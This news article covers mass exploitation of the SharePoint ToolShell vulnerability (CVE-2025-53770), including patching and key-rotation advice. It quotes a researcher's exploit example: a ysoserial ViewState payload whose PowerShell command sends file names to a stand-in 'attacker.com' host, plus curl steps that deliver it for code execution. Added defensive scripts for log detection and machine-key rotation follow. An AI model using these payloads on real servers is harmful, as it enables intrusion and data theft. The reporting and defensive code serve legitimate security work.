Authorities and researchers are sounding the alarm over the active mass exploitation of a high-severity vulnerability in Microsoft SharePoint Server that’s allowing attackers to make off with sensitive company data, including authentication tokens used to access systems inside networks. Researchers said anyone running an on-premises instance of SharePoint should assume their networks are breached.
The vulnerability, tracked as CVE-2025-53770, carries a severity rating of 9.8 out of a possible 10. It gives unauthenticated remote access to SharePoint Servers exposed to the Internet. Starting Friday, researchers began warning of active exploitation of the vulnerability, which affects SharePoint Servers that infrastructure customers run in-house. Microsoft’s cloud-hosted SharePoint Online and Microsoft 365 are not affected.
Not your typical webshell
Microsoft confirmed the attacks on the then-zero-day exploit on Saturday. A day later, the company updated the post to make available an emergency update patching the vulnerability, and a related one tracked as CVE-2025-53771, in SharePoint Subscription Edition and SharePoint 2019. Customers using either version should apply the updates immediately. SharePoint 2016 remained unpatched at the time this Ars post went live. Microsoft said that organizations using this version should install the Antimalware Scan Interface (AMSI) integration.
The exploitation chain observed is closely related to chains demonstrated in May at the Pwn2Own hacking competition in Berlin for two separate vulnerabilities. The exploited vulnerabilities, tracked as CVE-2025-49704 and CVE-2025-49706, were partially patched two weeks ago in Microsoft's monthly update release. This weekend’s patches for CVE-2025-53770 and CVE-2025-53771 include “more robust protections” for CVE-2025-49704 and CVE-2025-49706 respectively, Microsoft said.
Installing the updates is only the beginning of the recovery process, since the infections are allowing attackers to make off with authentication credentials that give wide access to a variety of sensitive resources inside a compromised network. More about those additional steps later in this article.
On Saturday, researchers from security firm Eye Security reported finding “dozens of systems actively compromised during two waves of attack, on 18th of July around 18:00 UTC and 19th of July around 07:30 UTC.” The systems, scattered across the globe, had been hacked using the exploited vulnerability and then infected with a webshell-based backdoor called ToolShell. Eye Security researchers said that the backdoor was able to gain access to the most sensitive parts of a SharePoint Server and from there extract tokens that allowed them to execute code that let the attackers expand their reach inside networks.
“This wasn’t your typical webshell,” Eye Security researchers wrote. “There were no interactive commands, reverse shells, or command-and-control logic. Instead, the page invoked internal .NET methods to read the SharePoint server’s MachineKey configuration, including the ValidationKey. These keys are essential for generating valid __VIEWSTATE payloads, and gaining access to them effectively turns any authenticated SharePoint request into a remote code execution opportunity.”
The remote code execution is made possible by using the exploit to target the way SharePoint translates data structures and object states into formats that can be stored or transmitted and then reconstructed later, a process known as serialization. A SharePoint vulnerability Microsoft fixed in 2021 had made it possible to abuse parsing logic to inject objects into pages. This occurred because SharePoint accepted ASP.NET ViewState objects signed with the ValidationKey, a signing key stored in the machine’s configuration. This could enable attackers to cause SharePoint to deserialize arbitrary objects and execute embedded commands. Those exploits, however, were limited by the requirement to generate a valid signature, which in turn required access to the server’s secret ValidationKey.
The researchers wrote:
Now, with the ToolShell chain (CVE-2025-49706 + CVE-2025-49704), attackers appear to extract the ValidationKey directly from memory or configuration. Once this cryptographic material is leaked, the attacker can craft fully valid, signed __VIEWSTATE payloads using a tool called ysoserial as shown in the example below. Using ysoserial the attacker can generate its own valid SharePoint tokens for RCE.
# command to get the __VIEWSTATEGENERATOR via any publicly available SharePoint page, like start.aspx
curl -s https://target.com/_layouts/15/start.aspx | grep -oP '__VIEWSTATEGENERATOR" value="\K[^"]+'

# example malicious PowerShell viewstate payload that the adversary can utilize as RCE to list a dir
ysoserial.exe -p ViewState -g TypeConfuseDelegate \
  -c "powershell -nop -c \"dir 'C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\TEMPLATE\LAYOUTS' | % { Invoke-WebRequest -Uri ('http://attacker.com/?f=' + [uri]::EscapeDataString($_.Name)) }\"" \
  --generator="" \
  --validationkey="" \
  --validationalg="" \
  --islegacy \
  --minify

# finally, by adding the generated token to any request, the command is executed (RCE)
curl http://target/_layouts/15/success.aspx?__VIEWSTATE=
These payloads can embed any malicious commands and are accepted by the server as trusted input, completing the RCE chain without requiring credentials. This mirrors the design weakness exploited in 2021, but now packaged into a modern zero-day chain with automatic shell drop, full persistence, and zero authentication.
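A defender-side check derived from the chain quoted above, added here as an example and not code from the Ars article or from Eye Security: the final step delivers the forged __VIEWSTATE in the URL query string of a /_layouts/ page, whereas legitimate ViewState travels in a POST body. The PowerShell below parses IIS W3C log lines (the sample entries are constructed, not real traffic, and the #Fields header drives column mapping) and flags any request to /_layouts/ whose cs-uri-query carries a __VIEWSTATE value.

```powershell
# Constructed sample of an IIS W3C log (not real traffic); the #Fields line determines the columns.
$sampleLog = @'
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2025-07-18 18:02:11 10.0.0.5 GET /_layouts/15/start.aspx - 443 203.0.113.10 200
2025-07-18 18:02:12 10.0.0.5 POST /_layouts/15/start.aspx - 443 198.51.100.7 200
2025-07-18 18:02:15 10.0.0.5 GET /_layouts/15/success.aspx __VIEWSTATE=CONSTRUCTED-PLACEHOLDER-VALUE 443 203.0.113.10 200
2025-07-18 18:03:40 10.0.0.5 GET /sites/hr/default.aspx - 443 192.0.2.44 200
'@

function Find-ViewStateInQuery {
    param([string[]]$Lines)

    $fields = $null
    foreach ($line in $Lines) {
        if ($line -like '#Fields:*') {
            # Column names for the entries that follow this header
            $fields = ($line -replace '^#Fields:\s*', '') -split '\s+'
            continue
        }
        if ($line.StartsWith('#') -or [string]::IsNullOrWhiteSpace($line) -or -not $fields) { continue }

        $values = $line -split '\s+'
        if ($values.Count -ne $fields.Count) { continue }   # malformed entry: skip rather than misparse

        $entry = @{}
        for ($i = 0; $i -lt $fields.Count; $i++) { $entry[$fields[$i]] = $values[$i] }

        # ViewState belongs in a POST body; __VIEWSTATE in the query string of a /_layouts/ page is anomalous
        if ($entry['cs-uri-stem'] -like '/_layouts/*' -and $entry['cs-uri-query'] -match '(?i)__VIEWSTATE=') {
            [pscustomobject]@{
                Time     = "$($entry['date']) $($entry['time'])"
                ClientIP = $entry['c-ip']
                Method   = $entry['cs-method']
                Path     = $entry['cs-uri-stem']
                Status   = $entry['sc-status']
                Reason   = '__VIEWSTATE supplied in URL query string'
            }
        }
    }
}

# Against the sample, only the success.aspx request from 203.0.113.10 is reported
$hits = Find-ViewStateInQuery -Lines ($sampleLog -split "`r?`n")
$hits | Format-Table -AutoSize
```

Against real logs, replace $sampleLog with Get-Content over the site's log directory (by default under C:\inetpub\logs\LogFiles\W3SVCn\) and keep the #Fields header your server actually writes; the heuristic is a triage signal for the request shape shown above, not a substitute for the indicators published by Eye Security and CISA.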
Patching is only the start
The attackers are using the capability to steal SharePoint ASP.NET machine keys, which allow the attackers to stage hacks of additional infrastructure at a later time. That means that patching alone provides no assurance attackers have been driven out of a compromised system. Instead, affected organizations must rotate SharePoint ASP.NET machine keys and restart the IIS webserver running on top.
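The rotation-and-restart step described in the paragraph above, as an added example rather than the article's or Microsoft's own script: it calls the SharePoint Management Shell cmdlet Update-SPMachineKey, which generates new ASP.NET machine keys for a web application, and then restarts IIS so the worker processes stop using the old keys. Assumptions: the shell runs elevated as a farm administrator, the security update has already been installed, and Update-SPMachineKey is available on your SharePoint build (the script checks for it before doing anything).

```powershell
# Added example: rotate SharePoint ASP.NET machine keys for every web application, then restart IIS.
# Run in an elevated SharePoint Management Shell as a farm administrator, after installing the update.
Add-PSSnapin Microsoft.SharePoint.PowerShell -ErrorAction SilentlyContinue

# Assumption: the cmdlet exists on this build; stop early if it does not, rather than restarting IIS for nothing
if (-not (Get-Command Update-SPMachineKey -ErrorAction SilentlyContinue)) {
    throw 'Update-SPMachineKey is not available on this SharePoint build; rotate keys via Central Administration or the vendor guidance for your version.'
}

$webApps = Get-SPWebApplication -IncludeCentralAdministration
foreach ($app in $webApps) {
    Write-Host "Rotating machine keys for $($app.Url)"
    # New ValidationKey/DecryptionKey values mean a previously stolen key no longer signs a valid __VIEWSTATE
    Update-SPMachineKey -WebApplication $app
}

# Worker processes keep the old keys in memory until IIS restarts
iisreset.exe
```

Run the IIS restart on every SharePoint server in the farm, not just the one where the rotation was triggered; a server still serving requests with the old keys cached leaves the window the paragraph warns about open.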
According to The Washington Post, at least two federal agencies have found servers inside their networks were breached in the ongoing attacks.
The Eye Security post provides technical indicators that admins can use to determine if their systems have been targeted in the attacks. It also provides a variety of measures vulnerable organizations can take to harden their systems against the activity.
In a post Sunday, the US Cybersecurity and Infrastructure Security Agency confirmed the attacks and their use of ToolShell. The post went on to provide its own list of security measures.